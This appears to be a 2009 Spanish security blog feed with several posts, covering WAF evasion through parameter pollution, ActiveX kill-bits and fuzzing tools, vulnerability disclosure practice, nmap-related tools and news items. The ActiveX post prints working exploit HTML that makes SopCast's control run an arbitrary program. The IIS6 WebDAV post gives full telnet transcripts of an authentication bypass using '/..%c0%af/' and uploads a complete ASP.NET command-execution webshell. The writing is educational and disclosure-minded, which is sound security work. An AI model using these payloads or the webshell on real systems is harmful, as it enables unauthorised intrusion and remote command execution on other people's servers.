En líneas generales, los Firewalls de Aplicaciones Web analizan las peticiones web basándose en firmas generalmente. Estas firmas son expresiones regulares que enfrentan contra las peticiones (los parámetros, las cabeceras, incluso el cuerpo de la página, etc...) de manera que, como si de un antivirus se tratara, si alguna de las "cadenas" coincide con la petición, la misma es bloqueada. Ahora bien, aprovechando esta nueva línea de ataque, es posible encapsular en la misma variable (repetida varias veces con diferente valor) un ataque, que si fuera en una sola variable, sería fácilmente detectada y bloqueada por cualquier WAF. De esta manera, al analizar cada parámetro, no se delimitaría como algo maliciosa la petición y sin embargo, al ser reensamblada e interpretada por el servidor web, sí que podría ser un riesgo en la seguridad de la aplicación.

Aquellos WAFs que no estén basados en tecnología de reverse proxy (proxy inverso) permitirán ser bypasseados ante este tipo de ataque.

Como ya indicamos en posts(1) anteriores( y 2), existe algún Firewall de Aplicaciones Web con un motor basado en ponderar los valores de los diferentes parámetros (con un funcionamiento parecido a un antispam) que en algunos de estos casos sería completamente efectivo (scoring list) además de porque está basado en tecnología de proxy inverso y en Apache, que como hemos visto sólo se quedaba con el primer valor asignado a un parámetro, reenviando sólo este valor al servidor final.

La presentación completa puede ser descargada aquí así como vista en Slideshare. Su lectura es altamente recomendable.
Leer más...

Steve Jobs ... ¿Owned?

Que un enmascarado-vengador-anonimo tiene menos credibilidad que una startup cuyos socios sean Luis Roldan y Julian Muñoz, es algo que cualquiera con dos dedos de frente tiene claro.

No obstante cada cierto tiempo se escuchan historias de gargantas profundas sobre hazañas relacionadas con misteriosos hackeos a personajes públicos.

En este caso le ha tocado al bueno de Steve Jobs ser víctima de uno de esos rumores, en concreto se ha publicado que un tal 'orin0co' se ha hecho con la cuenta en Amazon de Steve Jobs.

Cierto o no, el buen muchacho asegura que Jobs compró unos 20.000 artículos (!) en Amazon a lo largo de los últimos 10 años.

Supuestamente el acceso a las credenciales de Jobs fue conseguido mediante técnicas de phishing.

Cierto o no a partir de hoy cuando introduzca en google orin0co+steve jobs tendrá otro extra-point de karmawhorismo al ver su hazaña referenciada en castellano
Leer más...

20 mayo 2009

Seguridad en ActiveX

Los componentes ActiveX son objetos basados en COM y OLE que sirven para distribuir pequeñas aplicaciones por Internet mediante navegadores web (concretamente Internet Explorer). Cada una de estas aplicaciones son identificadas inequívocamente mediante un tipo de identificador "GUID" denominado "CLSID" (CLaSs IDentifier), que es mapeado opcionalmente a un nombre inteligible denominado "ProgID".

Por ejemplo, el CLSID "{8FEFF364-6A5F-4966-A917-A3AC28411659}", corresponde al ProgID "SOPOCX.SopCoreCtrl.1" y representa el ActiveX que muestra un visor multimedia de una red de televisión P2P llamado SopCast.

Para comprender la seguridad de los controles ActiveX es necesario entender el modelo en el que son cargados en IE sin solicitar permiso al usuario, como ocurre en la siguiente captura.




Los Kill-Bit son una entrada en el registro, que referencia el BIT 11, que marca un CLSID como no ejecutable dentro del navegador u otros entornos programables. Los killbits son liberados en actualizaciones con el objetivo de bloquear controles ActiveX de los que se conocen vulnerabilidades.

Se puede conocer que controles y objetos están "killeados" buscando en el registro, en concreto la clave "Compatibility Flags" ha de tener el valor con máscara "0x400" (COMPAT_EVIL_DONT_LOAD) dentro de las siguientes localizaciones:

x86 IE / x86 OS: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\CLSID del control ActiveX

x64 IE / x64 OS: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\CLSID del control ActiveX

x86 IE / x64 OS: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\CLSID del control ActiveX




Para consultar de forma rápida estas claves, existen herramientas que simplifican la tarea.

AxBan de Errata Security, permite seleccionar a que ActiveX marcar el KillBit.



GUI KillBit de SANS, similar a AxBan, permite seleccionar en base al nombre.

KillBit Explorer, permite identificar aquellos controles ActiveX con killbit activado.

ActiveX Compatibility Manager y ActiveXHelper, de Nirsoft, muestran información de los controles instalados en el sistema, también permite activarlos o desactivarlos. Ambos permiten ser ejecutados por línea de comandos.





Es importante destacar que muchos ActiveX son considerados inseguros en la zona de Internet y no son cargados automáticamente en base a otros criterios además del KillBit. La lógica que sigue el sistema operativo para determinarlo la detalló Fermín en un artículo que se resume en:
  1. Si está activo el KillBit, no se carga el control.
  2. En caso de IE7, el ActiveX tiene que tener una firma digital correcta.
  3. Se comprueba si el control tiene activo el interfaz IObjectSafety:

  4. Si el control no implementa IObjectSafety ni las propiedades en el registro, el ActiveX no es cargado
  5. Si implementa "Safe For Initialization", se permitirá su carga y la obtención de parámetros mediante el atributo data y param de las etiquetas correspondientes del html.
  6. Finalmente, el control podrá ser manipulado mediante javascripts u otros scripts si implementa o no "Safe for Scripting".
Ahora que hemos expuesto los principios básicos del modelo de seguridad, se detalla el análisis de un par de ejemplos de los que ya se han reportado vulnerables.

1.- Sopcast SopCore 'SetExternalPlayer()' ActiveX Control Remote Code Execution Vulnerability

Una vez se instala el componente que se desea auditar, se busca los métodos que exporta así como las propiedades que mantiene de seguridad. Esto se puede realizar de forma sencilla mediante dos herramientas.

OLE/COM Object Viewer, de Microsoft, permite seleccionar de toda la lista de controles el que queremos examinar y muestra sus interfaces, métodos y propiedades, resalta aquellos que no son del sistema y permite filtrar por los que tienen una determinada configuración como Safe for Scripting.



Es posible obtener más información de un interfaz pulsando con el botón derecho y seleccionando "View Typeinfo...", se muestra la siguiente ventana con el detalle de las propiedades y métodos de "IDispatch".



COMRaider de iDefense, pese a que no es su objetivo principal, permite obtener información detallada: ProgID, localización de la librería, CLSID, etcétera.



Y obtener las propiedades y métodos.



Otras herramientas: ActiveX Manager, ActiveXplorer o TypeLib Browser

Investigando la función "SetExternalPlayer", en la documentación del WebPlayer de Sopcast no deja muy claro su uso. Pero la lógica indica que seguramente sirva para configurar un reproductor multimedia distinto al propio de la compañía SopCast...

... Después de hacer varias pruebas, se puede comprobar que el ActiveX no comprueba el valor de entrada de este campo y ejecuta todo aquello que se le introduzca, sea un reproductor multimedia o cualquier otro comando.

Esta vulnerabilidad fue descubierta en Febrero del 2009 y tres meses después no se ha solucionado. Para explotarla es tan sencillo como utilizar el siguiente HTML:
<HTML><HEAD><script language="Javascript" type="text/JavaScript">
window.onload=function()
{
SopPlayer.InitPlayer();

<font color="#ff0000"><b><b>SopPlayer.SetExternalPlayer("c:\\WINDOWS\\system32\\calc.exe");</b></b></font>
SopPlayer.SetSopAddress("sop://broker.sopcast.com:3912/6002"); //A LIVE CHANNEL ...
SopPlayer.SetChannelName("CCTV5");
SopPlayer.Play();
}
</script></HEAD><BODY>
<div class="youtube-video"><object
ID="SopPlayer"
name="SopPlayer"
CLASSID=clsid:8FEFF364-6A5F-4966-A917-A3AC28411659
HEIGHT=375
WIDTH=375>
</object></div></BODY></HTML>

2.- Autodesk IDrop ActiveX Control 'IDrop.ocx' Multiple Heap Memory Corruption Vulnerabilities

Para instalar el ActiveX se puede descargar desde: http://www.autodesk.com/prods/idrop/download/idrop.cab, descomprimir el fichero, y ejecutar en la carpeta vía línea de comandos:

C:\idrop>regsvr32 idrop_sw.ocx

Repitiendo el proceso anterior, se obtiene información de OLEViewer y COMRaider:





En este caso las propiedades son algo más complicadas y analizarlas manualmente es una tarea lenta y compleja.

Para este tipo de situaciones se utilizan aplicaciones que permitan automatizar el proceso, entre ellas destacan el propio COMRaider, AXman de HDMoore o Dranzer, del CERT-US.

Fuzzering con COMRaider.

Empezando por COMRaider, se presiona con el botón derecho sobre el miembro a probar y seleccionando "Fuzz member". Esto generará una lista de archivos a chequear. Otra opción es hacer la prueba sobre toda la librería, lo que llevaría bastante más tiempo. Next->Click();



La siguiente pantalla, tras pulsar sobre "Begin Fuzzing", comenzará las pruebas,. Si hay suerte los contadores tras "Exceptions", "Windows" o "ApiTriggers", serán mayores de 0, en ese caso, habrá que analizar manualmente que está ocurriendo, si realmente es una vulnerabilidad y si se puede explotar. También puede generar cualquier tipo de excepción no controlada sin que tenga mayor impacto.



En este caso no hubo suerte, aunque COMRaider puede ser editado para llevar a cabo más y distintas pruebas, sacándole mucho más partido.



Fuzzering con Dranzer.

Dranzer es la herramienta más joven de las tres que se analizan, se liberó recientemente aunque ha permanecido bastante tiempo en el laboratorio del US-CERT. Se usa mediante línea de comandos.

Las opciones son sencillas:
Execution mode not specified use -g,-k,-l,-b, or -p
Usage: Dranzer <options>
Options:
-o <outputfile> - Output Filename
-i <inputfile> - Use input file CLSID list
-d <notestfile> - Use don't test CLSID List
-g - Generate base COM list
-k - Generate Kill Bit COM list
-l - Generate Interface Listings
-b - Load In Browser (IE)
-t - Test Interfaces Properties and Methods
-p - Test PARAMS (PropertyBag) in Internet Explorer
-s - Test PARAMS (Binary Scan) in Internet Explorer
-n - Print COM object information
-v - Print out version information


El siguiente ejemplo muestra información de los CLSID que contiene el archivo "idrop.txt", en este caso, únicamente el del IDrop de Autodesk.



Para automatizar las pruebas Dranzer dispone de dos opciones, PropertyBag (-p) y BinaryScan (-s). Al ejecutarlo con ellas (no simultáneamente), irá abriendo y cerrando el navegador comprobando su comportamiento. Desafortunadamente estas pruebas tampoco tienen efecto.



Es interesante el uso del parámetro -g para generar una lista de COMs que posteriormente podrá ser excluida del análisis con el parámetro -d. Evitando analizar controles que se conocen no vulnerables una y otra vez.

Fuzzering con AXMan.

El fuzzer de HDMoore fue presentado en la BlackHat, se usa mediante línea de comandos y un interfaz web. Es posiblemente el más sencillo de usar. Requiere tener instalado algún tipo de servidor web, como por ejemplo xampp

Lo primero es generar una base de datos con los controles instalados en el sistema, para eso una vez descargado se procede a ejecutar el binario con un directorio donde se almacenará la configuración, en este caso "conf"
C:\axman-1.0.0\bin>axman conf
La ejecución de este comando, generará varios errores y ventanas que se pueden cerrar sin problemas. Una vez finalice, es recomendable reiniciar el equipo que se encontrará en un estado bastante inestable.

El nuevo directorio "conf", ha de ser copiado dentro del subdirectorio "html", y este directorio servido por HTTP.



Se accede con el propio IE en local (http://localhost/). La aplicación permite analizar un rango de CLSIDs o bien uno individual. Se introduce el identificador del ActiveX de Autodesk y se pulsa sobre "Single". Si se produce algún error el navegador mostrará en la barra de estado la última prueba realizada, que podrá dar pistas de donde se encuentra el fallo.



Con esta herramienta, el navegador dará un error. El exploit es algo más complejo: un buffer overflow tradicional para el que hará falta algo de debug si queremos desarrollar el exploit. El resultado final del exploit se puede consultar aquí: http://www.milw0rm.com/exploits/8560

Otras herramientas de Fuzzering: COMBust, AXFuzz

Termino disculpándome, puesto que no he tenido suficiente tiempo para ser más breve.

Referencias:
ActiveX - Active Exploitation

Leer más...

19 mayo 2009

¿Les importa a las empresas las vulnerabilidades reportadas?

En este último año y sobre todo últimamente, desde Security By Default (y algún colaborador nuestro), hemos reportado diferentes vulnerabilidades a diferentes entidades: Menéame, Digg, Movistar, Sun (gracias Slai One), Popular.es, etc,...

En general, lo éticamente correcto cuando se encuentra una vulnerabilidad en un sistema, una vez analizado el impacto de la misma, es notificarla al fabricante o en caso de una página web, al contacto designado por la entidad propietaria. Un correo de contacto que debería ser válido es el proporcionado por la organización cuando efectúa el registro del dominio. Para ello lo que hacemos es buscar los registros whois del dominio o en caso de que falle (o hayan hecho caso a Yago) podemos intentarlo haciendo el Whois a la dirección IP directamente.

Una vez encontrado el contacto, se envía un correo, detallando lo mejor posible, la naturaleza del bug y cómo se ha encontrado (por casualidad o por intuición).

En nuestro caso además solemos indicar que nos gustaría saber cuándo ha sido parcheado el bug para poder publicar un artículo en el que hacemos pública una vulnerabilidad que ya ha sido solucionada, así como los detalles de explotabilidad de la misma.

A partir de aquí, lo lógico es esperar una contestación del tipo que sea en un tiempo prudencial.

Las respuestas han sido hasta ahora bastante diferentes:
  • Un mensaje automatizado que nos daba bastante pocas esperanzas de que la vulnerabilidad fuese a ser tratada en condiciones, como nos pasó con Digg.
  • Una comunicación bastante fluida y amable en la que se agradecía haber reportado el fallo y que en un breve espacio de tiempo sería solucionado: el caso de popular.es o Menéame,
  • Ningún tipo de respuesta, como hasta ahora ha sido el caso en Movistar y Sun (esta vulnerabilidad no ha sido ni descubierta ni notificada por nosotros, pero estamos al tanto de que la comunicación ha sido completamente unidireccional desde "Slai One" hacia Sun) no hemos obtenido respuesta de ningún tipo.
Si bien parece que las empresas de mayor volumen hacen caso omiso de las notificaciones de vulnerabilidades, hemos de encontrar la justificación de dicha latencia en la jerarquización y estratificación de las mismas. Conocemos que desde que llega un correo con la notificación (si es que llega y no lo filtra el antispam), se procesa por diferentes operadores, se reenvía al departamento correspondiente, se analiza, se comprueba su impacto, se piden los permisos para el cambio y se pasa a producción... pueden pasar varios días. Por eso en organizaciones más sencillas en cuanto a estructura, este tipo de problemas tiene menor tiempo de exposición.

No obstante parece mentira como organizaciones con gran cantidad de medios invertidos en seguridad (infraestructuras de IDS/IPS, servicios de auditoría de aplicaciones, criterios de programación segura, técnicos extremadamente competentes,...) no tengan en cuenta el facilitar de una forma más fácilmente alcanzable una dirección de correo en la que poder reportar los remotos fallos encontrados por terceros. Esta dirección obviamente debería ser monitorizada de manera continua por alguien del equipo de seguridad que pueda escalar el fallo al departamento correspondiente a la brevedad.
Leer más...

18 mayo 2009

La suite de herramientas de Fyodor

El señorito de la foto es Gordon Lyon, más conocido como Fyodor, creador de la herramienta de seguridad por excelencia, nmap. Pero esta no es la única aplicación interesante que nos podemos encontrar dentro de su web http://insecure.org

Todas estas aplicaciones anexas nacen como ideas planteadas para poder profundizar en ellas en el Google Summer Of Code, la iniciativa creada por Google para becar a estudiantes (beca de varios miles de euros) a que se pasen el verano entero desarrollando para un proyecto "Open Source" en vez de por ahí haciendo pentestings en la playa o fingerprintendeando en cualquier discoteca con espuma disparada de un cañón. Entre los proyectos, también se encuentra el nmap

Para ver ideas pendientes que se podrían desarrollar o seguir mejorando, podréis visitar este enlace.

Entre las más interesantes (algunas ya disponibles) se encuentran:

- zenmap -
***********
Para los que no se lleven bien con la línea de comandos, o no les hacía mucha gracia el frontend lanzador (wrapper) que venía hace varias versiones, nmapFE, se comenzó con este otro interfaz gráfico denominado Zenmap, para así poder aportar más funcionalidades extras.


Para este verano, se quiere mejorar su integración con el motor de scripting, así como posibilidad de exportar las topologías a imágenes y conseguir mayor velocidad en su procesamiento.

- ncat -
*******
¿Os suena netcat? Hasta hoy la última versión es la 0.7.1, que fué publicada el 11 de Enero de 2004...De ahí que se pretende crear desde cero una nueva navaja multiusos, respaldada por todo lo referente a nmap. Se lleva integrando en las releases de nmap ya desde las betas del 4.85, inicialmente incluida en la beta1, y este verano se intentará mejorar todo lo posible, ya que formará parte de la próxima versión estable.

Teneis la guía online en este enlace, de la que destacaría los trucos que se pueden realizar con el conjunto adecuado de parámetros, y que merecen un post aparte. Si os saben a poco, en la lista de nmap-dev se comenzó un hilo para que cada uno pudiera exponer los propios. Obviamente, también son aplicables a netcat. Mandar e-mails, crear servicios rápidamente sin necesidad de programación alguna y ponerlos a la escucha, envío de ficheros, y un largo etc.

Para saber hasta dónde se quiere llegar con ncat, visitad este enlace, y si teneis ideas u os veis capaces de llevar a cabo algún punto de la lista, esta es la mejor oportunidad.

Dejando las aplicaciones que ya podemos utilizar, le toca el turno a aquellas que se espera que vean la luz pronto, y cuyo empuje podría tener lugar en el Summer Of Code de este año 2009.

- nping -
*********
Si en el anterior punto hablábamos de querer revivir el proyecto netcat, ahora le toca el turno al hping de Antirez. Fyodor siempre se ha declarado un gran "fan" de esta herramienta, y que a diferencia de su hermanísimo pequeño ping, esta no sólo envía paquetes ICMP, sino que también TCP, UDP, etc. Se quiere llevar el concepto de hping a algo más, y para ello, nos encontramos con un español como coordinador del desarrollo, Luis Martín García, estudiante de Master de la Universidad Carlos III de Madrid. Todo un orgullo, del que esperamos tener más noticias pronto. Las intenciones de Fyodor con este proyecto se muestran en este hilo

- ncrack -
**********
ncrack pretende romper sistemas de autenticación de servicios como ssh, ftp, pop3, telnet, y un largo etc. Rápidamente se me viene a la mente, en línea de comandos, el cracker del grupo THC, llamado thc-hydra. Si nos pasamos por su página vemos como la última actualización es de 2006. Y Fyodor, al que vemos que tiene una especial preocupación por comenzar herramientas cuya competencia tienen un desarrollo caído en el olvido, propuso también en la lista nmap-dev el empezar este proyecto. Aquí podreis ver el llamamiento y sus propósitos con este futuro cracker.

Como él mismo comenta, actualmente dispone de scripts .nse (Nmap Scripting Engine) que realizan tareas de cracking en autenticación de varios servicios, y de manera muy eficiente al ser posible integrarlas con nmap, pero hace casi una decada se le ocurrió comenzar con este proyecto y ahora quiere rescatarlo, esperando que alguien pueda caminar junto a él en su desarrollo.

Estaremos pendientes a lo que sale definitivamente de este verano lleno de proyectos pendientes y muy interesantes.

[+] Descargar nmap 4.85BETA9, versión liberada el 12 de Mayo [source code][windows][otros]
Leer más...

17 mayo 2009

Para el que no lo sepa, OpenRipple es un proyecto Español para implementar un buscador distribuido que tuvo como cuna a Kriptopolis y que tiene como ambicioso proyecto convertirse en una alternativa a los buscadores tradicionales gestionados (en su mayoría) por grandes corporaciones.

OpenRipple ha sido nominado para los 'Sourceforge Community Choice Award' que son una especie de 'Oscars del software libre' ya que premian a las iniciativas mas innovadoras y de mas calidad.

Desde SbD nos parece que es todo un honor que esa nominación haya recaído en un proyecto hispano y nos sumamos a la convocatoria para recabar votos para el proyecto.

Ojala gane y todo esto ayude a la popularización del proyecto ya que, desde mi humilde opinión, este interesante proyecto no está contando con el apoyo que debiera por parte de los medios españoles

Para votar, se puede hacer aquí
Leer más...

16 mayo 2009

Alemania roba el dominio Wikileaks.de

Supongo que a muchos les sonará o conocerán Wikileaks, la web que se dedica a publicar informes / documentos que han sido 'filtrados' desde organismos gubernamentales y grandes corporaciones.

Tal vez su momento de gloria mas sonado fue cuando publicaron la lista de websites que el gobierno Australiano iba a bloquear, y terminaron por ser ellos mismos bloqueados.

Ahora, se ha conocido que Alemania, ese avanzado país Europeo se ha hecho con el control del dominio Wikileaks.de (que había sido registrado por la organización Wikileaks) y se lo ha auto-transferido a su control.

Nada se sabe de los motivos que le han llevado a hacer eso, pero si se conoce que Alemania tiene pensado implantar un sistema de filtrado-selectivo al estilo de lo que hace Australia.

Personalmente yo se que en España se realizan bloqueos-selectivos de webs por parte de ISPs en casos muy puntuales de phishings y fraudes pero no existe proyecto alguno para imponer una 'lista negra' de sites a bloquear, no obstante sin duda es muy muy preocupante la nueva tendencia 'gran-hermanistica' que invade el mundo civilizado
Leer más...

Fallo de autenticación de WebDav en IIS6

Kcope ha publicado hoy una nota de seguridad crítica que afecta a servidores web Internet Information Server en su versión 6 (IIS6) con el módulo de WebDav instalado.

El fallo es muy similar a otros anteriores. La validación por parte del servicio de caracteres Unicode se ejecuta de forma incorrecta, permitiendo saltarse la autenticación y por lo tanto, la lectura y escritura de ficheros en el sistema.

Para reproducir el problema, hemos descargado (warez!) una máquina virtual de Windows 2003 y ejecutado en un entorno VMWare. Tras instalar IIS6 y activar el módulo de Webdav sobre un directorio con ficheros, procedemos a probar la vulnerabilidad, que es tan sencilla como añadir los caracteres "/..%c0%af/" antes de la petición:

Se solicita de forma normal el archivo "test.txt" que contiene la cadena "prueba".

$ telnet 192.168.1.7 80
Trying 192.168.1.7...
Connected to 192.168.1.7.
Escape character is '^]'.
GET /testdav/test.txt HTTP/1.1
Translate: f
Connection: close
Host: servername


HTTP/1.1 401 Unauthorized
Content-Length: 1656
Content-Type: text/html
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
Date: Sat, 16 May 2009 02:19:04 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>You are not authorized to view this page</TITLE>
[...]

<h1>You are not authorized to view this page</h1>
You do not have permission to view this directory or page using the credentials that you supplied because your Web browser is sending a WWW-Authenticate header field that the Web server is not configured to accept.
<hr>
<p>Please try the following:</p>
[...]

</TD></TR></TABLE></BODY></HTML>
Connection closed by foreign host.

Lo que ocurre al añadir magia a la petición:
$ telnet 192.168.1.7 80
Trying 192.168.1.7...
Connected to 192.168.1.7.
Escape character is '^]'.
GET /..%c0%af/testdav/test.txt HTTP/1.1
Translate: f
Connection: close
Host: servername


HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 May 2009 02:15:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/plain
Content-Length: 6
ETag: "f093bdfac2d5c91:23b"
Last-Modified: Sat, 16 May 2009 01:09:36 GMT
Accept-Ranges: bytes

prueba
Connection closed by foreign host.

En el caso de subir ficheros, siempre y cuando los permisos NTFS y WebDav permitan la escritura y creación de archivos:

$ telnet 192.168.1.7 80
Trying 192.168.1.7...
Connected to 192.168.1.7.
Escape character is '^]'.
PUT /..%c0%af/testdav/test.txt HTTP/1.1
Translate: f
Connection: close
Host: servername
Content-Length: 5


test

HTTP/1.1 201 Created
Connection: close
Date: Sat, 16 May 2009 02:24:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://servername/testdav/test.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Si en vez de un inocente archivo de prueba, existe la posibilidad de que el WebDav esté habilitado para subir archivos ASPX:
$ telnet 192.168.1.7 80
Trying 192.168.1.7...
Connected to 192.168.1.7.
Escape character is '^]'.
PUT /..%c0%af/testdav/shell.aspx HTTP/1.1
Translate: f
Connection: close
Host: servername
Content-Length: 1312

<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 May 2009 02:34:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Finalmente, se accede por algún Virtual Directory que mapea el WebDav:





Leer más...